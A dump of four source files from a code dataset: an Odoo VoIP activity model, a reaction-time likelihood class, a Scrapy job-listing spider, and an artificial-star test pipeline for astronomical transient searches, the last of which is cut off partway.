+{"seq_id":"484170579","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nfrom odoo import api, fields, models\n\n\nclass MailActivityType(models.Model):\n _inherit = 'mail.activity.type'\n\n category = fields.Selection(selection_add=[('phonecall', 'Phonecall')])\n\n\nclass MailActivity(models.Model):\n _inherit = 'mail.activity'\n\n phone = fields.Char('Phone')\n mobile = fields.Char('Mobile')\n voip_phonecall_id = fields.Many2one('voip.phonecall', 'Linked Voip Phonecall')\n\n @api.model\n def create(self, values):\n activity = super(MailActivity, self).create(values)\n if activity.activity_type_id.category == 'phonecall':\n numbers = activity._compute_phonenumbers()\n if numbers['phone'] or numbers['mobile']:\n activity.phone = numbers['phone']\n activity.mobile = numbers['mobile']\n phonecall = self.env['voip.phonecall'].create_from_activity(activity)\n activity.voip_phonecall_id = phonecall.id\n notification = {'type': 'refresh_voip'}\n self.env['bus.bus'].sendone(\n (self._cr.dbname, 'res.partner', activity.user_id.partner_id.id),\n notification\n )\n return activity\n\n @api.multi\n def _compute_phonenumbers(self):\n self.ensure_one()\n model = self.env[self.res_model]\n record = model.browse(self.res_id)\n numbers = {\n 'phone': False,\n 'mobile': False,\n }\n if 'phone' in record:\n numbers['phone'] = record.phone\n if 'mobile' in record:\n numbers['mobile'] = record.mobile\n if not numbers['phone'] and not numbers['mobile']:\n fields = model._fields.items()\n partner_field_name = [k for k, v in fields if v.type == 'many2one' and v.comodel_name == 'res.partner']\n if partner_field_name:\n numbers['phone'] = record[partner_field_name[0]].phone\n numbers['mobile'] = record[partner_field_name[0]].mobile\n return numbers\n\n @api.multi\n def action_feedback(self, feedback=False):\n mail_message_id = False\n phone_activities = self.filtered(lambda a: a.voip_phonecall_id)\n if phone_activities:\n remaining = self - phone_activities\n for activity in phone_activities:\n user_id = activity.user_id.partner_id.id\n note = activity.note\n voip_phonecall_id = activity.voip_phonecall_id\n mail_message_id = super(MailActivity, activity).action_feedback(feedback)\n\n vals = {\n 'state': 'done',\n 'mail_message_id': mail_message_id,\n 'note': feedback if feedback else note,\n }\n if not voip_phonecall_id.call_date:\n vals.update(call_date=fields.Datetime.now())\n voip_phonecall_id.write(vals)\n self.env['bus.bus'].sendone(\n (self._cr.dbname, 'res.partner', user_id),\n {'type': 'refresh_voip'}\n )\n else:\n remaining = self\n if remaining:\n mail_message_id = super(MailActivity, remaining).action_feedback(feedback)\n\n return mail_message_id\n","sub_path":"voip/models/mail_activity.py","file_name":"mail_activity.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"391615933","text":"import numpy as np\nimport pandas as pd\nfrom pathlib import Path\n\n\nclass DataLikelihoods:\n def __init__(self, subject_num, **kwargs):\n \"\"\"\n Class to load in subject data and then compute likelihood of data given simulation\n\n Parameters\n ----------\n subject_num : Number of the subject as found in the CSV\n\n Outputs\n ----------\n self.likelihood : Likelihood of data. Computed incrementally. Requires calling\n self.increment_likelihood for each N and associated sim data dists and RTs.\n\n \"\"\"\n datapath = Path('../data/exp1.csv')\n exp1 = pd.read_csv(datapath, index_col=None)\n exp1.rename(columns={'sub': 'subno'}, inplace=True)\n\n self.sub_data = exp1.query('subno == {} & dyn == \\'Dynamic\\''.format(subject_num))\n self.likelihood = 0.\n\n def increment_likelihood(self, dist_matrix, rts_matrix, N, reward, lapse, **kwargs):\n \"\"\"\n Increments internal likelihood with the likelihood of given dists and rts\n\n Parameters\n ----------\n dist_matrix : 2 x 2 matrix of simulated data distributions (KDE) produced by obs class\n rts_matrix : 2 x 2 matrix of simulated reaction times (each entry a list of RTs) also\n produced by obs class\n N : N for given set of sim data\n reward : curr reward from optimizer\n lapse : lapse rate hyperparameter\n\n Outputs\n ----------\n Increment to self.likelihood\n\n \"\"\"\n N_data = self.sub_data.query('setsize == {}'.format(N))\n temp = np.mean(np.array(N_data['rt']))\n\n num_abs_0 = len(rts_matrix[0, 0])\n num_pres_1 = len(rts_matrix[1, 1])\n num_abs_1 = len(rts_matrix[0, 1])\n num_pres_0 = len(rts_matrix[1, 0])\n\n total_pres = num_pres_0 + num_pres_1\n total_abs = num_abs_0 + num_abs_1\n\n pres_rts_0 = N_data.query('resp == 2 & target == \\'Present\\'').rt.values\n pres_rts_1 = N_data.query('resp == 1 & target == \\'Present\\'').rt.values\n\n abs_rts_0 = N_data.query('resp == 2 & target == \\'Absent\\'').rt.values\n abs_rts_1 = N_data.query('resp == 1 & target == \\'Absent\\'').rt.values\n\n with np.errstate(divide='ignore'):\n # frac_pres_inc = len(pres_rts_0) / (len(pres_rts_0) + len(pres_rts_1))\n # frac_pres_corr = len(pres_rts_1) / (len(pres_rts_0) + len(pres_rts_1))\n log_like_pres = np.concatenate((np.log(num_pres_0 / total_pres) +\n np.log(dist_matrix[1, 0].pdf(pres_rts_0)),\n np.log(num_pres_1 / total_pres) +\n np.log(dist_matrix[1, 1].pdf(pres_rts_1))))\n\n # frac_abs_inc = len(abs_rts_1) / (len(abs_rts_0) + len(abs_rts_1))\n # frac_abs_corr = len(abs_rts_0) / (len(abs_rts_0) + len(abs_rts_1))\n log_like_abs = np.concatenate((np.log(num_abs_0 / total_abs) +\n np.log(dist_matrix[0, 0].pdf(abs_rts_0)),\n np.log(num_abs_1 / total_abs) +\n np.log(dist_matrix[0, 1].pdf(abs_rts_1))))\n\n log_like_all = np.concatenate((log_like_pres, log_like_abs))\n\n likelihood_pertrial = (1 - lapse) * np.exp(log_like_all) + \\\n (lapse / 2) * np.exp(-reward / temp)\n\n self.likelihood += -np.sum(np.log(likelihood_pertrial))\n","sub_path":"codes/data_and_likelihood.py","file_name":"data_and_likelihood.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"170064292","text":"# -*- coding: utf-8 -*-\n\"\"\"\n This spider is a HxsdJobs spider created on top of the ATSSpider\n scrapy crawl hxsdjobs -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://job.hxsd.com/companylist/info-corpid-42136.html\"\n\n sample job url:\n http://job.hxsd.com/companylist/info-positionid-30385.html\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, ConvertDateString\n\n\nclass HxsdJobs(ATSSpider):\n\n name = \"hxsdjobs\"\n Ref_Num = compile(r\"positionid-(\\d+).htm\")\n Job_Count = compile(r\"(\\d+)\")\n item_map = {\n unicode('职位名称', 'utf-8'): 'title',\n unicode('工作地点', 'utf-8'): 'location',\n unicode('更新时间', 'utf-8'): 'date',\n }\n\n def parse(self, response):\n selector = Selector(response)\n if not self.expected_job_count_set:\n job_count = selector.xpath('//td[@class=\"totalrow\"]/text()').re(self.Job_Count)\n if job_count:\n self.expected_job_count = job_count\n\n tableheads = selector.xpath(\n '//table[@class=\"standardtable\"]/thead/tr/th/text()').extract()\n meta_xpaths = {}\n for th in tableheads:\n if th in self.item_map:\n meta_xpaths[self.item_map[th]] = \"./td[\" + str(\n tableheads.index(th)+1)+\"]//text()\"\n\n jobs = selector.xpath('//table[@class=\"standardtable\"]//tr')\n for job in jobs:\n url = job.xpath('./td[1]/a/@href').extract()\n if url:\n meta = {}\n for mx in meta_xpaths:\n meta[mx] = job.xpath(meta_xpaths[mx]).extract()\n yield Request(\n callback=self.parse_job_callback(),\n meta=meta,\n url=url[0]\n )\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n\n details_xpath = '//li[contains(text(), \"%s\")]/span/text()'\n\n loader.add_xpath(\n 'baseSalary', details_xpath % unicode('职位薪资:', 'utf-8')\n )\n loader.add_xpath(\n 'description',\n [\n '//h3[contains(text(), \"%s\")]' % unicode('职位要求', 'utf-8'),\n '//div[@class=\"positiondescription\"]',\n ]\n )\n loader.add_xpath(\n 'educationrequirements',\n details_xpath % unicode('学历要求:', 'utf-8 ')\n )\n loader.add_xpath(\n 'experiencerequirements',\n details_xpath % unicode('工作经验:', 'utf-8')\n )\n loader.add_xpath('jobtype', details_xpath % unicode('工作性质:', 'utf-8'))\n\n loader.add_value(\n 'date', response.meta.get('date'), ConvertDateString('%Y-%m-%d')\n )\n loader.add_value(\n 'referencenumber', response.url,\n Prefix('%s-' % self.name), re=self.Ref_Num\n )\n loader.add_value('location', response.meta.get('location'))\n loader.add_value('title', response.meta.get('title'))\n loader.add_value('url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/hxsdjobs.py","file_name":"hxsdjobs.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"375352438","text":"description=\"---- all check for artstar G184098(case:add artstar in date image not ref image)\"\n'''\n#############################################################################\n'''\nimport sys,os,glob\nimport numpy as np\nimport datetime,time\nimport argparse\nimport subprocess\nimport pyfits\nfrom pyraf import iraf\nimport pylab\nimport zscale\nimport gw,gw_diff,gw_search,gw_rank,gw_mask,gw_all,gw_stamp,gw_look\nimport shutil\nfrom numpy import *\n\nif __name__ == \"__main__\":\n\n start_time = time.time()\n\n parser = argparse.ArgumentParser(description=description,\\\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"trigger\",help=\"trigger name\",choices=[\"G184098\",\n \"G211117\"])\n parser.add_argument(\"filter\",help=\"filter\",choices=[\"g\",\"r\",\"i\"])\n parser.add_argument(\"-b\", \"--badpix_lim\",type=float,nargs=2,\n dest='badpix_lim',help='Bad pixel mask limit ?') \n parser.add_argument(\"-c\", \"--clobber\",action=\"store_true\",\n dest='clobber',default=False,help='CLobber existing files') \n parser.add_argument(\"-x\", \"--xtasks\",dest='xtasks',default='mdsrg',\n help='run m-ask, d-iff, s-earch, r-ank, g-lobal, j-udge, f-ind ')\n parser.add_argument(\"-t\", \"--threshold\",dest=\"threshold\",default=3,\n help='sextractor threshold')\n parser.add_argument(\"-v\", \"--verbose\",dest=\"verbose\",action=\"store_true\",\\\n default=False,help='Enable task progress report')\n\n args = parser.parse_args()\n\n####################################################\ndef gw_stamps(datain,dataou,trigger,filtro,pointing,all_list,xc,yc,cuts,\\\n size,directory,maglist,exp,dist,number):\n\n date_new = list(all_list.keys())[0]\n mag = maglist[dist][date_new]\n if mag == 'out':\n f1 = '_'.join(['diff','art',trigger,filtro,date_new.replace('-',''),\n all_list[date_new].replace('-',''),pointing])\n ffcat = '_'.join(['art',trigger,filtro,date_new.replace('-',''),\n pointing])\n else:\n f1 = '_'.join(['diff','art',trigger,filtro,date_new.replace('-',''),\n all_list[date_new].replace('-',''),pointing+'.add',mag])\n ffcat = '_'.join(['art',trigger,filtro,date_new.replace('-',''),\n pointing+'.add',mag])\n\n imgnew = pyfits.open(dataou+directory+date_new+'/'+pointing+'/'+str(exp)+'/'+str(dist)+'/'+f1+'.fits')\n xdim = imgnew[0].header['NAXIS1']\n ydim = imgnew[0].header['NAXIS2']\n\n print('coords x=%.2f y=%.2f' % (xc,yc))\n\n _xycoo = iraf.wcsctran(input=\"STDIN\",output=\"STDOUT\",\\\n Stdin=[str(xc)+' '+str(yc)],Stdout=1,image=\\\n dataou+directory+date_new+'/'+pointing+'/'+\\\n str(exp)+'/'+str(dist)+'/'+ffcat+'.fits',\n inwcs='logical',outwcs='world',column=\"1 2\")[3:]\n coo = _xycoo[0].split()\n x1,x2 = int(xc-size/2.),int(xc+size/2.)\n y1,y2 = int(yc-size/2.),int(yc+size/2.)\n if x1 < 1: x1,x2 = 1,1+size\n if y1 < 1: y1,y2 = 1,1+size\n if x2 > xdim: x1,x2 = xdim-1-size,xdim\n if y2 > ydim: y1,y2 = ydim-1-size,ydim\n\n imglist,dimglist,bpmlist = {},{},{}\n scolist,dralist,ddeclist,catonelist,numlist = {},{},{},{},{}\n N,scolist[0] = 0,-9999\n belong = False\n\n for dd in all_list:\n fdir_n = dataou+directory+dd+'/'+pointing+'/'+str(exp)+'/'+str(dist)+'/'\n _im ='_'.join(['diff','art',trigger,filtro,dd.replace('-',''),all_list[dd].replace('-',''),pointing+'.add', maglist[dist][dd]])\n\n dimglist[dd] = pyfits.open(fdir_n+_im+'.fits')\n bpmlist[dd] = pyfits.open(fdir_n+_im+'.bpm.fits')\n imglist[dd] = pyfits.open(dataou+directory+dd+'/'+pointing+'/'+str(exp)+'/'+str(dist)+'/'+'_'.join(['art',trigger,filtro,dd.replace('-',''),pointing+'.add',maglist[dist][dd]])+'.fits')\n \n fcat = dataou+directory+dd+'/'+pointing+'/'+str(exp)+'/'+str(dist)+'/'+'_'.join(['dcat','art',trigger,filtro,dd.replace('-',''),all_list[dd].replace('-',''),pointing+'.add',maglist[dist][dd]])+'.fits'\n\n if not os.path.exists(fcat): continue\n pid = subprocess.Popen([\"stilts\",\"tpipe\",\"in=\"+fcat,\"ofmt=ascii\",\n \"cmd=sort -down Ranking\"],stdout=subprocess.PIPE) \n output,error = pid.communicate()\n\n _catalog = output.split(\"\\n\")\n header = _catalog[0][1:].split()\n# print enumerate(sorted(imglist.keys())),sorted(imglist.keys())\n# print imglist.keys()\n# raw_input('...')\n\n catalog = {}\n for h in header:\n catalog[h] = []\n for j,h in enumerate(header):\n for i in range(1,len(_catalog)-1):\n entry = _catalog[i].split()[j]\n if h in ['X_IMAGE_1','Y_IMAGE_1', 'X_WORLD_1','Y_WORLD_1',\\\n 'Ranking']: \n catalog[h].append(float(entry))\n elif entry != '\"\"': catalog[h].append(entry)\n else: catalog[h].append(NaN)\n for h in header:\n catalog[h] = array(catalog[h])\n\n ii = where((abs(catalog['X_IMAGE_1']-xc)<20.)\\\n &(abs(catalog['Y_IMAGE_1']-yc)<20.))\n\n if len(ii[0])==0: \n print(' ',dd,'not in catalog')\n continue\n\n catone = {}\n for h in header: \n catone[h] = catalog[h][ii] \n\n lx = catone['X_IMAGE_1'][0]\n ly = catone['Y_IMAGE_1'][0]\n dra = catone['X_WORLD_1'][0]\n ddec = catone['Y_WORLD_1'][0]\n# ra = iraf.clDms(dra/15.,digits=3)\n# dec = iraf.clDms(ddec,digits=2)\n search = catone['search'][0]\n score = catone['Ranking'][0]\n N+=1\n# epoch[N]=dnew\n belong = True\n\n scolist[N]=score \n if scolist[N] >= scolist[N-1]: \n scolist[N] = score\n# print score,N\n# raw_input('...')\n dralist[N]=dra\n ddeclist[N]=ddec\n catonelist[N]=catone\n numlist[N]=ii[0][0]+1\n print('found %d: %s n=%-4d x=%.2f y=%.f %d (%s)' % (N,dd,numlist[N],lx,ly,score,_im))\n# print scolist,dralist\n# imgref = pyfits.open(datain+trigger+'/'+all_list[dd]+'/'+\\\n# trigger+\"_VST_\"+filtro+\"_\"+all_list[dd].replace('-','')+\"_\"+pointing+'.fits')\n\n f2 = '_'.join(['art',trigger,filtro,all_list[dd].replace('-',''),pointing])\n imgref = pyfits.open(datain+directory+all_list[dd]+'/'+pointing+'/'+str(exp)+'/'+f2+'.fits')\n\n pylab.ion()\n pylab.figure(figsize=(8,8)) \n\n nstamp = 5\n step = 1/float(nstamp) \n xsize,ysize = step,step\n\n pylab.subplots_adjust(wspace=0.0001,hspace=0.0001,bottom=.01,top=0.99,\\\n left=0.01,right=0.99)\n\n pylab.subplot(111)\n\n ra = iraf.clDms(float(coo[0])/15.,digits=3)\n dec = iraf.clDms(float(coo[1]),digits=2)\n\n if belong == True:\n\n xx = sorted(list(scolist.items()),key=lambda scolist:scolist[0])\n NN = xx[-1][0]\n print('showing with highest score: N=', NN,'score=',xx[-1][1])\n catone=catonelist[NN]\n score = scolist[NN]\n dra=dralist[NN]\n ddec=ddeclist[NN]\n _num = numlist[NN]\n\n# sys.exit()\n pylab.figtext(.05,.95,'#artstar %d %s %s dist=%.4f exp%i %i/50' %\\\n (_num,trigger,pointing,float(dist),float(exp),float(number)),fontsize='x-large')\n\n pylab.figtext(.05,.92,' %s ra=%.2f dec=%.2f score=%s ' %\\\n (search,dra,ddec,score),fontsize='x-large')\n \n\n yl = 0.89\n pylab.figtext(.05,yl,' %12s %12s %7s %7s %8s %8s %7s ' \\\n % (' xc ',' yc ',' fwhm ','fluxrad','isoarea',\\\n 'mag auto','cl star'))\n pylab.figtext(0.83,yl,'rgood')\n\n lab = ['dif','new','ref']\n klab = ['_1','_2','']\n for k in klab:\n if not isnan(float(catone['X_IMAGE'+k][0])):\n _x = float(catone['X_IMAGE'+k][0])\n _y = float(catone['Y_IMAGE'+k][0])\n fwhm = float(catone['FWHM_IMAGE'+k][0])\n fluxrad = float(catone['FLUX_RADIUS'+k][0])\n isoarea = float(catone['ISOAREA_IMAGE'+k][0])\n magauto = float(catone['MAG_AUTO'+k][0])\n rgood = float(catone['rgood'][0])\n classtar = float(catone['CLASS_STAR'+k][0])\n yl += -.03\n# print lab[klab.index(k)], _x,_y,fwhm,fluxrad,isoarea,magauto, rgood,classtar\n \n pylab.figtext(.05,yl,\\\n '%-4s %9.2f %9.2f %7.2f %7.2f %8.2f %7.2f %7.2f' %\\\n (lab[klab.index(k)],_x,_y,fwhm,fluxrad,isoarea,magauto,classtar))\n\n pylab.figtext(0.83,0.83,'%5.2f dif' % rgood)\n\n else:\n pylab.figtext(.05,.92,'artstar RA=%10s DEC=%10s dist=%.4f exp%i %i/50 ' %\\\n (ra,dec,float(dist),float(exp),float(number)),fontsize='x-large')\n# pylab.figtext(.05,.98,' RA='+ra+' DEC='+dec+' input',fontsize=18)\n pylab.figtext(.05,.86,'not in our catalog', fontsize=24)\n pylab.figtext(.05,.82,' x=%.2f y=%.2f' %(xc,yc),fontsize=18)\n pylab.figtext(.05,.89,' %.7f %.7f ' %\\\n (float(coo[0]),float(coo[1])),fontsize='x-large')\n\n for i,e in enumerate(sorted(imglist.keys())):\n\n _img = imglist[e][0].section[y1:y2,x1:x2]\n if cuts: z1,z2 = cuts[1:-1].split(',')\n else: \n z1,z2 = zscale.zscale(_img)\n print(\"cuts for\",dd,' z1=',z1,\" z2=\",z2)\n pylab.subplot(5,5,5+i+1) \n imgshow = pylab.imshow(_img[::-1],cmap=pylab.cm.gray_r,\\\n vmin=int(z1),vmax=int(z2))\n pylab.text(0,0,e,fontsize=14)\n frame1 = pylab.gca()\n frame1.axes.get_xaxis().set_visible(False)\n frame1.axes.get_yaxis().set_visible(False)\n \n _img = imgref[0].section[y1:y2,x1:x2]\n if not cuts: z1,z2 = zscale.zscale(_img)\n pylab.subplot(5,5,15) \n imgshow = pylab.imshow(_img[::-1],cmap=pylab.cm.gray_r,\\\n vmin=int(z1),vmax=int(z2))\n pylab.text(0,0,all_list[dd],fontsize=14)\n frame1 = pylab.gca()\n frame1.axes.get_xaxis().set_visible(False)\n frame1.axes.get_yaxis().set_visible(False)\n\n for i,e in enumerate(sorted(dimglist.keys())):\n _img = dimglist[e][0].section[y1:y2,x1:x2]\n z1,z2 = zscale.zscale(_img)\n pylab.subplot(5,5,15+i+1) \n imgshow = pylab.imshow(_img[::-1],cmap=pylab.cm.gray_r,\\\n vmin=int(z1),vmax=int(z2))\n\n frame1 = pylab.gca()\n frame1.axes.get_xaxis().set_visible(False)\n frame1.axes.get_yaxis().set_visible(False)\n pylab.text(0,0,'d'+e,fontsize=14)\n \n for i,e in enumerate(sorted(bpmlist.keys())):\n _img = bpmlist[e][0].section[y1:y2,x1:x2]\n pylab.subplot(5,5,20+i+1) \n imgshow = pylab.imshow(_img[::-1],cmap=pylab.cm.gray_r,\\\n vmin=90,vmax=100)\n\n frame1 = pylab.gca()\n frame1.axes.get_xaxis().set_visible(False)\n frame1.axes.get_yaxis().set_visible(False)\n pylab.text(0,0,'d'+e,fontsize=14)\n \n verbose=True\n answ=\"-\"\n while answ[0]!='q':\n answ =input(\">> #, d-iff or ob-j lightcurve or q-uit:\")\n if len(answ)>0: \n if answ in 'do':\n if belong == False: search='P'\n if answ in 'd':ii=14\n else:ii=12 \n ff = open('_sn.coo','w')\n ff.write(str(xc)+\" \"+str(yc))\n ff.close()\n ph,mag,merr = gw_look.gw_lightcurve(all_list,\\\n trigger,filtro,pointing,\\\n answ,search,optlist,verbose)\n gw_plotlc(ph,mag[0],merr[0],ii)\n else: answ='q'\n\ndef gw_plotlc(ph,mag,merr,i):\n \n pylab.subplot(5,5,i)\n ph = array(ph)-min(ph)\n apmag,apmerr = array(mag),array(merr)\n ii = where(apmerr>0)\n if len(ii[0])>0:\n pylab.errorbar(ph[ii],apmag[ii],yerr=apmerr[ii],fmt='ob')\n ie = where(apmerr==-1)\n if len(ie[0])>0:\n yerrl = zeros(len(ie[0]))-.3\n yerru = zeros(len(ie[0]))\n pylab.errorbar(ph[ie],apmag[ie],yerr=[yerrl,yerru],\\\n uplims=True,fmt='ob') \n\n if len(apmag): pylab.ylim(max(apmag)+.1,min(apmag)-.1)\n else: pylab.ylim(27,20)\n pylab.tick_params(axis='y',direction='in',pad=-15)\n pylab.xlim(min(ph)-10,max(ph)+5)\n pylab.ylim(max(apmag)+.4,min(apmag)-.4)\n\n\n###################################################\nif __name__ == \"__main__\":\n\n datain = os.path.expandvars(\"$gw_datain\") \n dataou = os.path.expandvars(\"$gw_dataou\") \n\n optlist = gw.read_default()\n optlist['hotpants']['nrx'], optlist['hotpants']['nry'] = '1','1'\n trigger = args.trigger\n filtro = args.filter\n all_list, maglist = {}, {}\n areclist = open('record_all_list','w')\n areclist.write('#gw_all %s %s \\n' % (trigger, filtro))\n# areclist.write('#action exp data pointing (magnitude) timespend \\n')\n reclist=open('record_list')\n aa = reclist.readlines()\n for bb in aa:\n if bb[0]=='c':\n line = bb.split(';')\n nexp,dd,pp,mag,zgw = [],[],[],[],[]\n input(line)\n for i in range(len(line)):\n ele = line[i].split()\n for j in range(len(ele)):\n if ele[j] == 'copy':\n nexp.append(ele[j+1])\n dd.append(ele[j+2])\n pp.append(ele[j+3])\n zgw.append(ele[j+4])\n if ele[j+4] == 'ref': mag.append('None')\n elif ele[j] == 'addstar':\n mag.append(ele[j+4])\n _p,_d,_r = unique(pp)[0],unique(dd)[0],unique(dd)[1]\n if _p not in all_list: all_list[_p] = {}\n all_list[_p][_d] = _r\n\n for i in range(len(zgw)):\n if zgw[i] not in maglist: maglist[zgw[i]] = {}\n maglist[zgw[i]][_d] = mag[i]\n elif bb[0]=='@':directory = bb.split('@')[1]\n\n exp = len(unique(nexp))\n input(exp)\n zgw1=[]\n for rs in zgw:\n if rs != 'ref':\n zgw1.append(rs)\n\n for i in range(0,exp):\n for _p in sorted([int(x[1:]) for x in all_list]):\n p = 'p'+str(_p)\n for d in sorted(all_list[p]):\n dnew = d\n dref = all_list[p][d]\n\n for rs in zgw1:\n # create mask\n if 'm' in args.xtasks: \n for d in [dnew, dref]:\n if d == dnew: case = 'new'\n else:case = 'ref'\n print('MASK',case,trigger,filtro,d,p,rs,maglist[rs][dnew],i)\n areclist.write(' '.join(['MASK',trigger,filtro,d,p,rs,maglist[rs][dnew],str(i)])+'\\n')\n message = gw_mask.gw_bpm(dataou,dataou,trigger,filtro,d,p, optlist,args.badpix_lim,args.clobber,args.threshold,args.verbose,True,case,str(i),maglist[rs][dnew],rs,directory)\n print(message)\n \n print(25*\" \"+\"time span\",int(time.time()-start_time),\"sec\")\n\n # compute difference\n if 'd' in args.xtasks: \n print('DIFF',trigger,filtro,dnew,dref,p,rs,i)\n areclist.write(' '.join(['DIFF',trigger,filtro,dnew,dref,p,rs,maglist[rs][dnew],str(i)])+'\\n')\n gw_diff.gw_diff(dataou,dataou,trigger,filtro,dnew,dref,p, optlist,args.clobber,args.verbose,True,str(i),maglist[rs][dnew],rs,directory)\n\n print(25*\" \"+\"time span\",int(time.time()-start_time),\"sec\")\n\n # search candidates\n if 's' in args.xtasks: \n print('SEARCH',trigger,filtro,dnew,dref,p,rs,i)\n areclist.write(' '.join(['SEARCH',trigger,filtro,dnew,dref,p,rs,maglist[rs][dnew],str(i)])+'\\n')\n gw_search.gw_search(dataou,dataou,trigger,filtro,dnew,dref,p,optlist,'b',args.clobber,args.verbose,True,str(i),maglist[rs][dnew],rs,directory) \n print(25*\" \"+\"time span\",int(time.time()-start_time),\"sec\") \n\n # rank candidates\n if 'r' in args.xtasks: \n print('RANK',trigger,filtro,dnew,dref,p,rs,i)\n areclist.write(' '.join(['RANK',trigger,filtro,dnew,dref,p,rs,maglist[rs][dnew],str(i)])+'\\n')\n gw_rank.gw_rank(dataou,trigger,filtro,dnew,\\\n dref,p,args.clobber,args.verbose,True,\\\n str(i),maglist[rs][dnew],rs,directory)\n print(25*\" \"+\"time span\",int(time.time()-start_time),\"sec\")\n\n for i in range(0,exp):\n for _p in sorted([int(x[1:]) for x in all_list]):\n p = 'p'+str(_p)\n for rs in zgw1:\n # global merge\n if 'g' in args.xtasks: \n print('global merge',trigger,filtro,p,rs)\n areclist.write(' '.join(['GLOBAL',trigger,filtro,dnew,dref,p,rs,str(i)])+'\\n')\n gw_all.gw_global_rank(dataou,trigger,filtro,all_list,\\\n args.verbose,True,str(i),maglist,rs,directory)\n print(25*\" \"+\"time span\",int(time.time()-start_time),\"sec\")\n reclist.close()\n # all merge\n# print 'all merge',trigger,filtro,dnew,dref,p\n# gw_all.gw_all_rank(dataou,trigger,filtro,all_list,\\\n# args.score,args.clobber,args.verbose,True,\\\n# str(i),maglist[dnew])\n# print 25*\" \"+\"time span\",int(time.time()-start_time),\"sec\"\n\n fnew = dataou+directory+'artlist_'+p+'.asc'\n shutil.copy('_artlist',fnew)\n if 'j' in args.xtasks: \n if not os.path.exists(dataou+directory+'cresult'):\n os.mkdir(dataou+directory+'cresult')\n for nexp in range(0,exp):\n for _p in sorted([int(x[1:]) for x in all_list]):\n p = 'p'+str(_p)\n ffww = open(dataou+directory+'cresult/cresult_'+p+'.asc','w')\n ffww.write('#dist tot pos \\n')\n for rs in zgw1:\n print('judge',trigger,filtro,p,rs,nexp)\n ffww.write(rs+' ')\n ## read _artliat\n wfile = open('tmp_judge.asc','w')\n wfile.write('#X_IMAGE Y_IMAGE TYPE\\n')\n in1 = dataou+directory+\"global_art_\"+trigger+\"_\"+filtro+\"_\"+p+\"_\"+str(nexp)+\"_\"+str(rs)+'.fits'\n readlist=open(fnew)\n aa = readlist.readlines()\n for bb in aa: \n try:\n wfile.write((bb.split()[0]+' '+bb.split()[1]+' '+bb.split()[3]+'\\n'))\n except:\n wfile.close()\n gw.stilts_run(\"stilts tpipe tmp_judge.asc ifmt=ascii out=tmp_judge.fits\",'transfer to fits',True)\n in2 = 'tmp_judge.fits'\n## 3 arcsec\n rad = 1/0.21\n gw.stilts_run(\"stilts tmatch2 in1=\"+in1+\\\n \" matcher=2d params=\"+str(rad)+ \" values1='X_IMAGE_1 Y_IMAGE_1' in2=\"+in2+\\\n \" values2='X_IMAGE Y_IMAGE' out=tmp_merged_judge_\"+str(p)+'_'+str(rs)+'_'+\\\n str(nexp)+\".fits\"+\" join=all2 find=best2\",'cross checking',True)\n\n gw.stilts_run(\"stilts tpipe cmd='replacecol Separation \"+\\\n \" 0.21*sqrt(pow(X_IMAGE_1-X_IMAGE_2a,2)+pow(Y_IMAGE_1-Y_IMAGE_2a,2))'\"+\\\n \" in=tmp_merged_judge_\"+str(p)+'_'+str(rs)+'_'+str(nexp)+\".fits\"+\\\n \" out=\"+dataou+directory+\"global_merged_\"+str(p)+'_'+str(rs)+'_'+\\\n str(nexp)+\".fits\",'Compute separation from reference',True)\n \n gw.stilts_run(\"stilts tpipe in=tmp_merged_judge_\"+\\\n str(p)+'_'+str(rs)+'_'+str(nexp)+\".fits out=tmp_merged_judge_\"+\\\n str(p)+'_'+str(rs)+'_'+str(nexp)+\".asc ofmt=ascii\",\"to ascii\",True)\n\n ff = open('tmp_merged_judge_'+str(p)+'_'+str(rs)+'_'+str(nexp)+'.asc')\n ffw = open(dataou+directory+'cresult/cresult_'+str(p)+'_'+str(rs)+'_'+str(nexp)+'.asc','w')\n ffw.write('check result for '+str(trigger)+' '+str(p)+' '+str(rs)+' '+str(nexp)+'\\n')\n ffw.write('#X Y rank dist type (gid dis) \\n')\n head = ff.readline()\n righe = ff.readlines()\n nrank, ndist, tpd, fin= 0,0,[],{}\n for r in righe:\n if len(head.split())==114:\n ximg = r.split()[-4]\n yimg = r.split()[-3]\n rank = r.split()[-7]\n dist = r.split()[-1]\n typ = r.split()[-2]\n gid = ''\n gis = ''\n elif len(head.split())==116:\n ## group found, including gid,gis\n ximg = r.split()[-6]\n yimg = r.split()[-5]\n rank = r.split()[-9]\n dist = r.split()[-1]\n typ = r.split()[-4]\n gid = r.split()[-3]\n gis = r.split()[-2]\n else:\n print('fits size error!!!')\n sys.exit()\n \n ffw.write(' '.join([ximg,yimg,rank,dist,typ,gid,gis,'\\n']))\n if dist != '\"\"' and float(dist) < 0.5:\n ndist+=1\n if rank != '\"\"' and float(rank) > 0:nrank+=1\n if dist != '\"\"':tpd.append(typ)\n for i in range(len(unique(tpd))):\n aa=0\n for j in range(len(tpd)):\n if tpd[j]==unique(tpd[i]):\n aa+=1\n fin[unique(tpd)[i]]=aa\n ffw.write('\\n'+'within0.5:'+str(ndist)+' positive:'+str(nrank)+'\\n'+str(fin))\n ffww.write(str(ndist/40.)+' '+str(nrank/40.)+'\\n')\n ffw.close()\n ffww.close()\n\n\n # stamp art star\n if 'f' in args.xtasks: \n for i in range(0,exp):\n for _p in sorted([int(x[1:]) for x in all_list]):\n p = 'p'+str(_p)\n f1 = dataou+directory+'artlist_'+p+'.asc'\n readlist=open(f1)\n aa = readlist.readlines()\n number,coo1,coo2,nn=[],[],[],1\n for bb in aa:\n number.append(nn)\n try:\n coo1.append(bb.split()[0])\n 